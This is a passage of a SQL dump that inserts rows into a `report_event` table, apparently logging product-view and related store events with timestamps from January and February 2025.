(15444, '2025-01-13 04:38:33', 1, 2062, 0, 1, 1),
(15445, '2025-01-13 05:56:26', 1, 2060, 0, 1, 1),
(15446, '2025-01-13 11:28:46', 1, 2062, 0, 1, 1),
(15447, '2025-01-13 17:11:31', 1, 2061, 0, 1, 1),
(15448, '2025-01-13 17:50:04', 1, 2063, 0, 1, 1),
(15449, '2025-01-13 18:55:38', 1, 2053, 0, 1, 1),
(15450, '2025-01-13 19:00:59', 1, 2061, 0, 1, 1),
(15451, '2025-01-14 05:54:03', 1, 2060, 0, 1, 1),
(15452, '2025-01-14 09:54:03', 1, 2061, 0, 1, 1),
(15453, '2025-01-14 11:36:50', 1, 2062, 0, 1, 1),
(15454, '2025-01-14 12:02:32', 1, 2061, 0, 1, 1),
(15455, '2025-01-14 12:02:40', 1, 2062, 0, 1, 1),
(15456, '2025-01-14 12:02:41', 1, 2063, 0, 1, 1),
(15457, '2025-01-14 12:02:46', 1, 2064, 0, 1, 1),
(15458, '2025-01-14 12:02:55', 1, 2053, 0, 1, 1),
(15459, '2025-01-14 12:43:55', 1, 2064, 0, 1, 1),
(15460, '2025-01-14 17:24:32', 1, 2054, 0, 1, 1),
(15461, '2025-01-14 17:31:24', 1, 2054, 0, 1, 1),
(15462, '2025-01-14 17:53:27', 1, 2063, 0, 1, 1),
(15463, '2025-01-14 18:57:40', 1, 2053, 0, 1, 1),
(15464, '2025-01-15 02:34:25', 1, 2054, 0, 1, 1),
(15465, '2025-01-15 03:14:09', 1, 2055, 0, 1, 1),
(15466, '2025-01-15 03:14:21', 1, 2064, 0, 1, 1),
(15467, '2025-01-15 03:14:26', 1, 2063, 0, 1, 1),
(15468, '2025-01-15 03:14:30', 1, 2062, 0, 1, 1),
(15469, '2025-01-15 03:14:34', 1, 2060, 0, 1, 1),
(15470, '2025-01-15 05:54:35', 1, 2060, 0, 1, 1),
(15471, '2025-01-15 11:33:55', 1, 2062, 0, 1, 1),
(15472, '2025-01-15 14:25:54', 1, 2059, 0, 1, 1),
(15473, '2025-01-15 20:50:05', 1, 2064, 0, 1, 1),
(15474, '2025-01-16 02:47:18', 1, 2060, 0, 1, 1),
(15475, '2025-01-16 08:13:26', 1, 2060, 0, 1, 1),
(15476, '2025-01-16 08:22:49', 1, 2063, 0, 1, 1),
(15477, '2025-01-16 08:47:05', 1, 2058, 0, 1, 1),
(15478, '2025-01-16 09:36:32', 1, 2055, 0, 1, 1),
(15479, '2025-01-16 11:23:45', 1, 2061, 0, 1, 1),
(15480, '2025-01-16 12:25:56', 1, 2062, 0, 1, 1),
(15481, '2025-01-16 13:32:56', 1, 2064, 0, 1, 1),
(15482, '2025-01-16 14:15:04', 1, 2054, 0, 1, 1),
(15483, '2025-01-16 14:33:32', 1, 2059, 0, 1, 1),
(15484, '2025-01-16 14:46:24', 1, 2064, 0, 1, 1),
(15485, '2025-01-16 17:27:09', 1, 2064, 0, 1, 1),
(15486, '2025-01-17 00:51:12', 1, 2058, 0, 1, 1),
(15487, '2025-01-17 01:29:37', 1, 2061, 0, 1, 1),
(15488, '2025-01-17 01:45:47', 1, 2060, 0, 1, 1),
(15489, '2025-01-17 01:54:46', 1, 2063, 0, 1, 1),
(15490, '2025-01-17 02:18:02', 1, 2058, 0, 1, 1),
(15491, '2025-01-17 03:03:27', 1, 2055, 0, 1, 1),
(15492, '2025-01-17 03:30:48', 1, 2060, 0, 1, 1),
(15493, '2025-01-17 03:31:16', 1, 2064, 0, 1, 1),
(15494, '2025-01-17 03:38:50', 1, 2063, 0, 1, 1),
(15495, '2025-01-17 03:59:01', 1, 2058, 0, 1, 1),
(15496, '2025-01-17 04:39:08', 1, 2055, 0, 1, 1),
(15497, '2025-01-17 06:14:16', 1, 2061, 0, 1, 1),
(15498, '2025-01-17 06:34:54', 1, 2060, 0, 1, 1),
(15499, '2025-01-17 07:11:01', 1, 2062, 0, 1, 1),
(15500, '2025-01-17 09:00:21', 1, 2060, 0, 1, 1),
(15501, '2025-01-17 09:18:41', 1, 2063, 0, 1, 1),
(15502, '2025-01-17 10:04:14', 1, 2058, 0, 1, 1),
(15503, '2025-01-17 10:38:46', 1, 2060, 0, 1, 1),
(15504, '2025-01-17 10:47:45', 1, 2063, 0, 1, 1),
(15505, '2025-01-17 11:10:16', 1, 2058, 0, 1, 1),
(15506, '2025-01-17 11:54:49', 1, 2055, 0, 1, 1),
(15507, '2025-01-17 13:34:06', 1, 2061, 0, 1, 1),
(15508, '2025-01-17 14:28:33', 1, 2062, 0, 1, 1),
(15509, '2025-01-17 16:05:07', 1, 2060, 0, 1, 1),
(15510, '2025-01-17 16:13:22', 1, 2063, 0, 1, 1),
(15511, '2025-01-17 16:35:06', 1, 2058, 0, 1, 1),
(15512, '2025-01-17 16:46:50', 1, 2059, 0, 1, 1),
(15513, '2025-01-17 17:19:35', 1, 2055, 0, 1, 1),
(15514, '2025-01-17 17:54:13', 1, 2060, 0, 1, 1),
(15515, '2025-01-17 18:03:24', 1, 2063, 0, 1, 1),
(15516, '2025-01-17 18:31:52', 1, 2060, 0, 1, 1),
(15517, '2025-01-17 18:40:48', 1, 2063, 0, 1, 1),
(15518, '2025-01-17 19:04:00', 1, 2058, 0, 1, 1),
(15519, '2025-01-17 19:49:21', 1, 2055, 0, 1, 1),
(15520, '2025-01-17 21:30:26', 1, 2061, 0, 1, 1),
(15521, '2025-01-17 22:30:27', 1, 2062, 0, 1, 1),
(15522, '2025-01-18 00:19:28', 1, 2054, 0, 1, 1),
(15523, '2025-01-18 00:38:01', 1, 2059, 0, 1, 1),
(15524, '2025-01-18 00:51:56', 1, 2064, 0, 1, 1),
(15525, '2025-01-18 01:50:32', 1, 2060, 0, 1, 1),
(15526, '2025-01-18 01:58:51', 1, 2063, 0, 1, 1),
(15527, '2025-01-18 02:19:52', 1, 2058, 0, 1, 1),
(15528, '2025-01-18 03:00:48', 1, 2055, 0, 1, 1),
(15529, '2025-01-18 04:25:38', 1, 2062, 0, 1, 1),
(15530, '2025-01-18 04:37:09', 1, 2061, 0, 1, 1),
(15531, '2025-01-18 05:33:27', 1, 2062, 0, 1, 1),
(15532, '2025-01-18 06:27:29', 1, 2064, 0, 1, 1),
(15533, '2025-01-18 06:28:08', 1, 2062, 0, 1, 1),
(15534, '2025-01-18 06:28:28', 1, 2053, 0, 1, 1),
(15535, '2025-01-18 06:29:12', 1, 2063, 0, 1, 1),
(15536, '2025-01-18 06:29:16', 1, 2061, 0, 1, 1),
(15537, '2025-01-18 06:29:24', 1, 2059, 0, 1, 1),
(15538, '2025-01-18 06:29:28', 1, 2058, 0, 1, 1),
(15539, '2025-01-18 06:30:36', 1, 2055, 0, 1, 1),
(15540, '2025-01-18 06:30:40', 1, 2054, 0, 1, 1),
(15541, '2025-01-18 06:31:24', 1, 2060, 0, 1, 1),
(15542, '2025-01-18 07:13:57', 1, 2054, 0, 1, 1),
(15543, '2025-01-18 07:31:34', 1, 2059, 0, 1, 1),
(15544, '2025-01-18 07:44:15', 1, 2064, 0, 1, 1),
(15545, '2025-01-18 09:42:37', 1, 2064, 0, 1, 1),
(15546, '2025-01-18 09:43:20', 1, 2062, 0, 1, 1),
(15547, '2025-01-18 09:44:16', 1, 2063, 0, 1, 1),
(15548, '2025-01-18 09:44:24', 1, 2061, 0, 1, 1),
(15549, '2025-01-18 09:44:32', 1, 2059, 0, 1, 1),
(15550, '2025-01-18 09:44:36', 1, 2058, 0, 1, 1),
(15551, '2025-01-18 09:45:44', 1, 2055, 0, 1, 1),
(15552, '2025-01-18 09:45:49', 1, 2054, 0, 1, 1),
(15553, '2025-01-18 09:47:56', 1, 2060, 0, 1, 1),
(15554, '2025-01-18 11:48:58', 1, 2055, 0, 1, 1),
(15555, '2025-01-18 12:35:03', 1, 2064, 0, 1, 1),
(15556, '2025-01-18 14:31:02', 1, 2064, 0, 1, 1),
(15557, '2025-01-18 15:03:25', 1, 2054, 0, 1, 1),
(15558, '2025-01-18 16:14:36', 1, 2062, 0, 1, 1),
(15559, '2025-01-18 16:24:59', 1, 2059, 0, 1, 1),
(15560, '2025-01-18 19:41:32', 1, 2053, 0, 1, 1),
(15561, '2025-01-18 20:32:23', 1, 2061, 0, 1, 1),
(15562, '2025-01-18 20:39:04', 1, 2063, 0, 1, 1),
(15563, '2025-01-19 04:09:17', 1, 2061, 0, 1, 1),
(15564, '2025-01-19 04:36:17', 1, 2064, 0, 1, 1),
(15565, '2025-01-19 05:11:33', 1, 2058, 0, 1, 1),
(15566, '2025-01-19 07:10:47', 1, 2064, 0, 1, 1),
(15567, '2025-01-19 07:12:37', 1, 2064, 0, 1, 1),
(15568, '2025-01-19 09:55:47', 1, 2058, 0, 1, 1),
(15569, '2025-01-19 10:08:10', 1, 2059, 0, 1, 1),
(15570, '2025-01-19 11:55:16', 1, 2055, 0, 1, 1),
(15571, '2025-01-19 14:07:33', 1, 2058, 0, 1, 1),
(15572, '2025-01-19 17:59:44', 1, 2062, 0, 1, 1),
(15573, '2025-01-19 19:49:57', 1, 2063, 0, 1, 1),
(15574, '2025-01-19 22:18:38', 1, 2058, 0, 1, 1),
(15575, '2025-01-20 07:05:55', 1, 2063, 0, 1, 1),
(15576, '2025-01-20 07:55:41', 1, 2060, 0, 1, 1),
(15577, '2025-01-20 09:37:45', 1, 2060, 0, 1, 1),
(15578, '2025-01-20 13:53:19', 1, 2058, 0, 1, 1),
(15579, '2025-01-20 14:38:28', 1, 2062, 0, 1, 1),
(15580, '2025-01-20 21:49:01', 1, 2058, 0, 1, 1),
(15581, '2025-01-21 00:34:55', 1, 2059, 0, 1, 1),
(15582, '2025-01-21 04:03:13', 1, 2054, 0, 1, 1),
(15583, '2025-01-21 05:08:58', 1, 2059, 0, 1, 1),
(15584, '2025-01-21 05:54:02', 1, 2055, 0, 1, 1),
(15585, '2025-01-21 12:38:07', 1, 2058, 0, 1, 1),
(15586, '2025-01-21 16:03:55', 1, 2062, 0, 1, 1),
(15587, '2025-01-21 19:18:17', 1, 2062, 0, 1, 1),
(15588, '2025-01-22 03:20:28', 1, 2054, 0, 1, 1),
(15589, '2025-01-22 03:20:32', 1, 2055, 0, 1, 1),
(15590, '2025-01-22 03:20:40', 1, 2064, 0, 1, 1),
(15591, '2025-01-22 03:20:43', 1, 2063, 0, 1, 1),
(15592, '2025-01-22 03:20:45', 1, 2062, 0, 1, 1),
(15593, '2025-01-22 03:20:48', 1, 2060, 0, 1, 1),
(15594, '2025-01-22 03:20:50', 1, 2059, 0, 1, 1),
(15595, '2025-01-22 03:20:52', 1, 2061, 0, 1, 1),
(15596, '2025-01-22 03:20:54', 1, 2058, 0, 1, 1),
(15597, '2025-01-22 04:33:31', 1, 2064, 0, 1, 1),
(15598, '2025-01-22 05:30:18', 1, 2064, 0, 1, 1),
(15599, '2025-01-22 05:36:16', 1, 2063, 0, 1, 1),
(15600, '2025-01-22 06:58:24', 1, 2063, 0, 1, 1),
(15601, '2025-01-22 11:29:19', 1, 2058, 0, 1, 1),
(15602, '2025-01-22 12:40:05', 1, 2061, 0, 1, 1),
(15603, '2025-01-22 13:49:13', 1, 2058, 0, 1, 1),
(15604, '2025-01-22 16:02:04', 1, 2062, 0, 1, 1),
(15605, '2025-01-22 19:33:23', 1, 2054, 0, 1, 1),
(15606, '2025-01-23 04:50:34', 1, 2061, 0, 1, 1),
(15607, '2025-01-23 04:55:32', 1, 2059, 0, 1, 1),
(15608, '2025-01-23 05:15:32', 1, 2053, 0, 1, 1),
(15609, '2025-01-23 09:41:23', 1, 2059, 0, 1, 1),
(15610, '2025-01-23 09:41:23', 1, 2059, 0, 1, 1),
(15611, '2025-01-23 10:08:53', 1, 2061, 0, 1, 1),
(15612, '2025-01-23 10:09:00', 1, 2054, 0, 1, 1),
(15613, '2025-01-23 10:47:09', 1, 2063, 0, 1, 1),
(15614, '2025-01-23 10:47:10', 1, 2062, 0, 1, 1),
(15615, '2025-01-23 10:47:11', 1, 2060, 0, 1, 1),
(15616, '2025-01-23 10:47:13', 1, 2059, 0, 1, 1),
(15617, '2025-01-23 10:47:16', 1, 2058, 0, 1, 1),
(15618, '2025-01-23 10:49:50', 1, 2064, 0, 1, 1),
(15619, '2025-01-23 10:49:51', 1, 2061, 0, 1, 1),
(15620, '2025-01-23 10:49:51', 1, 2060, 0, 1, 1),
(15621, '2025-01-23 10:49:52', 1, 2055, 0, 1, 1),
(15622, '2025-01-23 10:49:53', 1, 2064, 0, 1, 1),
(15623, '2025-01-23 10:49:53', 1, 2063, 0, 1, 1),
(15624, '2025-01-23 10:49:55', 1, 2062, 0, 1, 1),
(15625, '2025-01-23 10:49:56', 1, 2060, 0, 1, 1),
(15626, '2025-01-23 10:52:26', 1, 2055, 0, 1, 1),
(15627, '2025-01-23 10:52:26', 1, 2054, 0, 1, 1),
(15628, '2025-01-23 10:52:31', 1, 2053, 0, 1, 1),
(15629, '2025-01-23 10:52:34', 1, 2058, 0, 1, 1),
(15630, '2025-01-23 10:52:36', 1, 2053, 0, 1, 1),
(15631, '2025-01-23 10:52:37', 1, 2058, 0, 1, 1),
(15632, '2025-01-23 12:39:45', 1, 2058, 0, 1, 1),
(15633, '2025-01-23 12:51:01', 1, 2054, 0, 1, 1),
(15634, '2025-01-23 14:03:02', 1, 2055, 0, 1, 1),
(15635, '2025-01-23 14:48:08', 1, 2062, 0, 1, 1),
(15636, '2025-01-23 15:54:47', 1, 2062, 0, 1, 1),
(15637, '2025-01-23 18:10:52', 1, 2061, 0, 1, 1),
(15638, '2025-01-24 05:35:35', 1, 2064, 0, 1, 1),
(15639, '2025-01-24 15:41:53', 1, 2062, 0, 1, 1),
(15640, '2025-01-24 18:19:43', 1, 2064, 0, 1, 1),
(15641, '2025-01-25 03:13:01', 1, 2062, 0, 1, 1),
(15642, '2025-01-25 12:10:21', 1, 2062, 0, 1, 1),
(15643, '2025-01-25 14:56:29', 1, 2062, 0, 1, 1),
(15644, '2025-01-25 17:28:26', 1, 2054, 0, 1, 1),
(15645, '2025-01-25 17:33:33', 1, 2058, 0, 1, 1),
(15646, '2025-01-25 21:38:10', 1, 2058, 0, 1, 1),
(15647, '2025-01-25 21:52:54', 1, 2061, 0, 1, 1),
(15648, '2025-01-26 00:27:29', 1, 2064, 0, 1, 1),
(15649, '2025-01-26 03:38:35', 1, 2060, 0, 1, 1),
(15650, '2025-01-26 07:01:06', 1, 2053, 0, 1, 1),
(15651, '2025-01-26 13:23:02', 1, 2063, 0, 1, 1),
(15652, '2025-01-26 14:50:24', 1, 2062, 0, 1, 1),
(15653, '2025-01-26 16:16:09', 1, 2063, 0, 1, 1),
(15654, '2025-01-26 22:24:14', 1, 2062, 0, 1, 1),
(15655, '2025-01-27 14:31:52', 1, 2062, 0, 1, 1),
(15656, '2025-01-27 14:47:43', 1, 2063, 0, 1, 1),
(15657, '2025-01-27 16:04:54', 1, 2059, 0, 1, 1),
(15658, '2025-01-27 16:21:34', 1, 2064, 0, 1, 1),
(15659, '2025-01-28 04:17:58', 1, 2053, 0, 1, 1),
(15660, '2025-01-28 06:59:04', 1, 2060, 0, 1, 1),
(15661, '2025-01-28 07:29:41', 1, 2064, 0, 1, 1),
(15662, '2025-01-28 07:29:49', 4, 2064, 2908, 1, 1),
(15663, '2025-01-28 07:30:14', 1, 2064, 0, 1, 1),
(15664, '2025-01-28 07:30:20', 4, 2064, 2909, 1, 1),
(15665, '2025-01-28 07:30:41', 1, 2064, 0, 1, 1),
(15666, '2025-01-28 07:30:49', 4, 2064, 2910, 1, 1),
(15667, '2025-01-28 07:31:10', 1, 2064, 0, 1, 1),
(15668, '2025-01-28 07:31:15', 4, 2064, 2911, 1, 1),
(15669, '2025-01-28 07:31:33', 1, 2064, 0, 1, 1),
(15670, '2025-01-28 07:31:39', 4, 2064, 2912, 1, 1),
(15671, '2025-01-28 07:31:56', 1, 2064, 0, 1, 1),
(15672, '2025-01-28 07:32:02', 4, 2064, 2913, 1, 1),
(15673, '2025-01-28 07:39:44', 1, 2054, 0, 1, 1),
(15674, '2025-01-28 08:01:50', 1, 2055, 0, 1, 1),
(15675, '2025-01-28 11:26:48', 1, 2062, 0, 1, 1),
(15676, '2025-01-28 12:02:16', 1, 2055, 0, 1, 1),
(15677, '2025-01-28 14:33:02', 1, 2062, 0, 1, 1),
(15678, '2025-01-28 15:22:19', 1, 2064, 0, 1, 1),
(15679, '2025-01-28 16:22:45', 1, 2054, 0, 1, 1),
(15680, '2025-01-28 16:53:46', 1, 2055, 0, 1, 1),
(15681, '2025-01-28 18:17:25', 1, 2061, 0, 1, 1),
(15682, '2025-01-28 20:47:54', 1, 2059, 0, 1, 1),
(15683, '2025-01-28 20:57:28', 1, 2058, 0, 1, 1),
(15684, '2025-01-28 21:02:28', 1, 2054, 0, 1, 1),
(15685, '2025-01-28 23:15:03', 1, 2061, 0, 1, 1),
(15686, '2025-01-29 01:58:39', 1, 2060, 0, 1, 1),
(15687, '2025-01-29 08:57:47', 1, 2059, 0, 1, 1),
(15688, '2025-01-29 10:22:56', 1, 2064, 0, 1, 1),
(15689, '2025-01-29 12:11:23', 1, 2060, 0, 1, 1),
(15690, '2025-01-29 12:44:52', 1, 2054, 0, 1, 1),
(15691, '2025-01-29 14:34:00', 1, 2060, 0, 1, 1),
(15692, '2025-01-29 15:39:47', 1, 2062, 0, 1, 1),
(15693, '2025-01-29 17:38:07', 1, 2060, 0, 1, 1),
(15694, '2025-01-29 17:52:06', 1, 2060, 0, 1, 1),
(15695, '2025-01-29 21:43:03', 1, 2058, 0, 1, 1),
(15696, '2025-01-29 22:50:28', 1, 2058, 0, 1, 1),
(15697, '2025-01-29 22:50:38', 1, 2064, 0, 1, 1),
(15698, '2025-01-29 22:50:50', 1, 2062, 0, 1, 1),
(15699, '2025-01-29 22:50:52', 1, 2055, 0, 1, 1),
(15700, '2025-01-29 22:50:58', 1, 2059, 0, 1, 1),
(15701, '2025-01-29 22:51:00', 1, 2063, 0, 1, 1),
(15702, '2025-01-29 22:51:02', 1, 2054, 0, 1, 1),
(15703, '2025-01-29 22:51:04', 1, 2061, 0, 1, 1),
(15704, '2025-01-29 22:51:12', 1, 2060, 0, 1, 1),
(15705, '2025-01-29 22:51:27', 1, 2058, 0, 1, 1),
(15706, '2025-01-29 22:51:36', 1, 2064, 0, 1, 1),
(15707, '2025-01-29 22:51:41', 1, 2054, 0, 1, 1),
(15708, '2025-01-29 22:51:44', 1, 2062, 0, 1, 1),
(15709, '2025-01-29 22:51:45', 1, 2055, 0, 1, 1),
(15710, '2025-01-29 22:51:51', 1, 2059, 0, 1, 1),
(15711, '2025-01-29 22:51:54', 1, 2063, 0, 1, 1),
(15712, '2025-01-29 22:51:56', 1, 2061, 0, 1, 1),
(15713, '2025-01-29 22:51:59', 1, 2060, 0, 1, 1),
(15714, '2025-01-29 22:52:07', 1, 2053, 0, 1, 1),
(15715, '2025-01-30 11:58:28', 1, 2064, 0, 1, 1),
(15716, '2025-01-30 14:10:40', 1, 2058, 0, 1, 1),
(15717, '2025-01-30 14:48:56', 1, 2062, 0, 1, 1),
(15718, '2025-01-30 16:51:53', 1, 2062, 0, 1, 1),
(15719, '2025-01-30 20:14:36', 1, 2059, 0, 1, 1),
(15720, '2025-01-31 10:41:17', 1, 2053, 0, 1, 1),
(15721, '2025-01-31 12:56:06', 1, 2061, 0, 1, 1),
(15722, '2025-01-31 13:32:45', 1, 2054, 0, 1, 1),
(15723, '2025-01-31 14:39:57', 1, 2062, 0, 1, 1),
(15724, '2025-02-01 04:58:10', 1, 2059, 0, 1, 1),
(15725, '2025-02-01 05:39:49', 1, 2062, 0, 1, 1),
(15726, '2025-02-01 15:42:12', 1, 2062, 0, 1, 1),
(15727, '2025-02-01 17:25:08', 1, 2063, 0, 1, 1),
(15728, '2025-02-02 01:04:12', 1, 2063, 0, 1, 1),
(15729, '2025-02-02 01:53:35', 1, 2060, 0, 1, 1),
(15730, '2025-02-02 04:14:13', 1, 2059, 0, 1, 1),
(15731, '2025-02-02 06:59:00', 1, 2055, 0, 1, 1),
(15732, '2025-02-02 14:44:04', 1, 2062, 0, 1, 1),
(15733, '2025-02-02 23:14:28', 1, 2063, 0, 1, 1),
(15734, '2025-02-03 01:36:34', 1, 2064, 0, 1, 1),
(15735, '2025-02-03 03:58:49', 1, 2058, 0, 1, 1),
(15736, '2025-02-03 08:11:14', 1, 2053, 0, 1, 1),
(15737, '2025-02-03 14:29:08', 1, 2062, 0, 1, 1),
(15738, '2025-02-03 16:03:27', 1, 2063, 0, 1, 1),
(15739, '2025-02-03 17:21:26', 1, 2054, 0, 1, 1),
(15740, '2025-02-03 18:27:47', 1, 2058, 0, 1, 1),
(15741, '2025-02-03 18:41:31', 1, 2058, 0, 1, 1),
(15742, '2025-02-04 03:48:25', 1, 2061, 0, 1, 1),
(15743, '2025-02-04 10:39:49', 1, 2062, 0, 1, 1),
(15744, '2025-02-04 14:19:40', 1, 2062, 0, 1, 1),
(15745, '2025-02-04 14:20:22', 1, 2061, 0, 1, 1),
(15746, '2025-02-04 14:57:05', 1, 2060, 0, 1, 1),
(15747, '2025-02-04 15:23:41', 1, 2062, 0, 1, 1),
(15748, '2025-02-04 19:27:05', 1, 2061, 0, 1, 1),
(15749, '2025-02-04 20:58:13', 1, 2064, 0, 1, 1),
(15750, '2025-02-05 08:12:24', 1, 2064, 0, 1, 1),
(15751, '2025-02-05 14:38:46', 1, 2062, 0, 1, 1),
(15752, '2025-02-05 22:21:15', 1, 2059, 0, 1, 1),
(15753, '2025-02-05 22:59:44', 1, 2064, 0, 1, 1),
(15754, '2025-02-06 10:21:17', 1, 2060, 0, 1, 1),
(15755, '2025-02-06 15:51:38', 1, 2062, 0, 1, 1),
(15756, '2025-02-06 20:29:45', 1, 2063, 0, 1, 1),
(15757, '2025-02-07 01:35:50', 1, 2061, 0, 1, 1),
(15758, '2025-02-07 01:47:49', 1, 2058, 0, 1, 1),
(15759, '2025-02-07 03:20:17', 1, 2058, 0, 1, 1),
(15760, '2025-02-07 07:43:34', 1, 2055, 0, 1, 1),
(15761, '2025-02-07 13:27:55', 1, 2064, 0, 1, 1),
(15762, '2025-02-07 14:13:38', 1, 2059, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(15763, '2025-02-07 15:51:17', 1, 2060, 0, 1, 1),
(15764, '2025-02-07 15:51:21', 4, 2060, 2933, 1, 1),
(15765, '2025-02-07 21:26:56', 1, 2062, 0, 1, 1),
(15766, '2025-02-07 22:13:15', 1, 2060, 0, 1, 1),
(15767, '2025-02-08 00:57:44', 1, 2062, 0, 1, 1),
(15768, '2025-02-08 05:41:12', 1, 2059, 0, 1, 1),
(15769, '2025-02-08 06:04:40', 1, 2064, 0, 1, 1),
(15770, '2025-02-08 06:04:40', 1, 2055, 0, 1, 1),
(15771, '2025-02-08 06:04:40', 1, 2058, 0, 1, 1),
(15772, '2025-02-08 06:04:40', 1, 2064, 0, 1, 1),
(15773, '2025-02-08 06:04:40', 1, 2053, 0, 1, 1),
(15774, '2025-02-08 06:04:40', 1, 2064, 0, 1, 1),
(15775, '2025-02-08 06:04:57', 1, 2061, 0, 1, 1),
(15776, '2025-02-08 06:05:16', 1, 2060, 0, 1, 1),
(15777, '2025-02-08 06:05:18', 1, 2054, 0, 1, 1),
(15778, '2025-02-08 06:05:19', 1, 2062, 0, 1, 1),
(15779, '2025-02-08 06:05:20', 1, 2053, 0, 1, 1),
(15780, '2025-02-08 06:05:22', 1, 2063, 0, 1, 1),
(15781, '2025-02-08 06:05:23', 1, 2059, 0, 1, 1),
(15782, '2025-02-08 08:03:45', 1, 2053, 0, 1, 1),
(15783, '2025-02-08 08:58:08', 1, 2062, 0, 1, 1),
(15784, '2025-02-08 13:23:38', 1, 2063, 0, 1, 1),
(15785, '2025-02-08 14:32:49', 1, 2062, 0, 1, 1),
(15786, '2025-02-08 14:52:55', 1, 2058, 0, 1, 1),
(15787, '2025-02-08 22:23:36', 1, 2058, 0, 1, 1),
(15788, '2025-02-09 07:00:07', 1, 2059, 0, 1, 1),
(15789, '2025-02-09 09:17:29', 1, 2063, 0, 1, 1),
(15790, '2025-02-09 14:36:27', 1, 2062, 0, 1, 1),
(15791, '2025-02-09 16:26:17', 1, 2060, 0, 1, 1),
(15792, '2025-02-09 16:26:21', 4, 2060, 2938, 1, 1),
(15793, '2025-02-09 17:36:48', 1, 2053, 0, 1, 1),
(15794, '2025-02-09 17:38:57', 1, 2054, 0, 1, 1),
(15795, '2025-02-09 20:23:32', 1, 2062, 0, 1, 1),
(15796, '2025-02-09 22:39:36', 1, 2064, 0, 1, 1),
(15797, '2025-02-09 22:46:47', 1, 2064, 0, 1, 1),
(15798, '2025-02-09 22:59:02', 1, 2063, 0, 1, 1),
(15799, '2025-02-09 23:09:32', 1, 2060, 0, 1, 1),
(15800, '2025-02-09 23:18:06', 1, 2059, 0, 1, 1),
(15801, '2025-02-10 00:06:55', 1, 2058, 0, 1, 1),
(15802, '2025-02-10 05:10:03', 1, 2064, 0, 1, 1),
(15803, '2025-02-10 14:27:12', 1, 2061, 0, 1, 1),
(15804, '2025-02-10 14:36:55', 1, 2062, 0, 1, 1),
(15805, '2025-02-11 00:15:58', 1, 2061, 0, 1, 1),
(15806, '2025-02-11 00:23:17', 1, 2058, 0, 1, 1),
(15807, '2025-02-11 00:33:19', 1, 2055, 0, 1, 1),
(15808, '2025-02-11 02:02:41', 1, 2064, 0, 1, 1),
(15809, '2025-02-11 13:02:51', 1, 2055, 0, 1, 1),
(15810, '2025-02-11 15:05:26', 1, 2062, 0, 1, 1),
(15811, '2025-02-12 05:52:16', 1, 2061, 0, 1, 1),
(15812, '2025-02-12 10:55:00', 1, 2061, 0, 1, 1),
(15813, '2025-02-12 10:55:03', 1, 2061, 0, 1, 1),
(15814, '2025-02-12 14:23:27', 1, 2064, 0, 1, 1),
(15815, '2025-02-12 15:05:01', 1, 2062, 0, 1, 1),
(15816, '2025-02-12 15:31:38', 1, 2061, 0, 1, 1),
(15817, '2025-02-12 16:09:36', 1, 2061, 0, 1, 1),
(15818, '2025-02-12 16:29:28', 1, 2062, 0, 1, 1),
(15819, '2025-02-12 17:44:30', 1, 2064, 0, 1, 1),
(15820, '2025-02-12 18:01:25', 1, 2060, 0, 1, 1),
(15821, '2025-02-12 19:28:42', 1, 2063, 0, 1, 1),
(15822, '2025-02-13 04:18:17', 1, 2059, 0, 1, 1),
(15823, '2025-02-13 05:10:53', 1, 2060, 0, 1, 1),
(15824, '2025-02-13 09:45:28', 1, 2062, 0, 1, 1),
(15825, '2025-02-13 10:26:06', 1, 2062, 0, 1, 1),
(15826, '2025-02-13 11:00:42', 1, 2062, 0, 1, 1),
(15827, '2025-02-13 12:15:49', 1, 2062, 0, 1, 1),
(15828, '2025-02-13 15:26:41', 1, 2062, 0, 1, 1),
(15829, '2025-02-13 17:46:01', 1, 2061, 0, 1, 1),
(15830, '2025-02-13 19:49:38', 1, 2064, 0, 1, 1),
(15831, '2025-02-13 21:59:21', 1, 2063, 0, 1, 1),
(15832, '2025-02-14 10:26:07', 1, 2062, 0, 1, 1),
(15833, '2025-02-14 12:02:46', 1, 2062, 0, 1, 1),
(15834, '2025-02-14 12:02:54', 1, 2064, 0, 1, 1),
(15835, '2025-02-14 12:02:55', 1, 2063, 0, 1, 1),
(15836, '2025-02-14 14:30:34', 1, 2062, 0, 1, 1),
(15837, '2025-02-14 17:24:21', 1, 2064, 0, 1, 1),
(15838, '2025-02-14 23:03:06', 1, 2058, 0, 1, 1),
(15839, '2025-02-15 02:04:53', 1, 2059, 0, 1, 1),
(15840, '2025-02-15 03:07:02', 1, 2064, 0, 1, 1),
(15841, '2025-02-15 10:46:50', 1, 2061, 0, 1, 1),
(15842, '2025-02-15 15:17:31', 1, 2062, 0, 1, 1),
(15843, '2025-02-15 19:30:50', 1, 2062, 0, 1, 1),
(15844, '2025-02-16 03:08:42', 1, 2062, 0, 1, 1),
(15845, '2025-02-16 03:41:34', 1, 2061, 0, 1, 1),
(15846, '2025-02-16 04:52:44', 1, 2063, 0, 1, 1),
(15847, '2025-02-16 12:13:12', 1, 2060, 0, 1, 1),
(15848, '2025-02-16 14:36:17', 1, 2058, 0, 1, 1),
(15849, '2025-02-16 14:49:07', 1, 2062, 0, 1, 1),
(15850, '2025-02-16 17:27:49', 1, 2063, 0, 1, 1),
(15851, '2025-02-16 19:32:33', 1, 2058, 0, 1, 1),
(15852, '2025-02-16 23:29:36', 1, 2064, 0, 1, 1),
(15853, '2025-02-17 05:22:37', 1, 2060, 0, 1, 1),
(15854, '2025-02-17 05:41:34', 1, 2064, 0, 1, 1),
(15855, '2025-02-17 10:06:49', 1, 2064, 0, 1, 1),
(15856, '2025-02-17 10:07:29', 1, 2062, 0, 1, 1),
(15857, '2025-02-17 10:07:48', 1, 2053, 0, 1, 1),
(15858, '2025-02-17 10:08:32', 1, 2063, 0, 1, 1),
(15859, '2025-02-17 10:08:36', 1, 2061, 0, 1, 1),
(15860, '2025-02-17 10:08:44', 1, 2059, 0, 1, 1),
(15861, '2025-02-17 10:08:48', 1, 2058, 0, 1, 1),
(15862, '2025-02-17 10:09:56', 1, 2055, 0, 1, 1),
(15863, '2025-02-17 10:10:00', 1, 2054, 0, 1, 1),
(15864, '2025-02-17 10:11:24', 1, 2060, 0, 1, 1),
(15865, '2025-02-17 13:11:52', 1, 2064, 0, 1, 1),
(15866, '2025-02-17 13:32:14', 1, 2061, 0, 1, 1),
(15867, '2025-02-17 14:54:18', 1, 2062, 0, 1, 1),
(15868, '2025-02-17 14:55:15', 1, 2054, 0, 1, 1),
(15869, '2025-02-17 15:43:42', 1, 2055, 0, 1, 1),
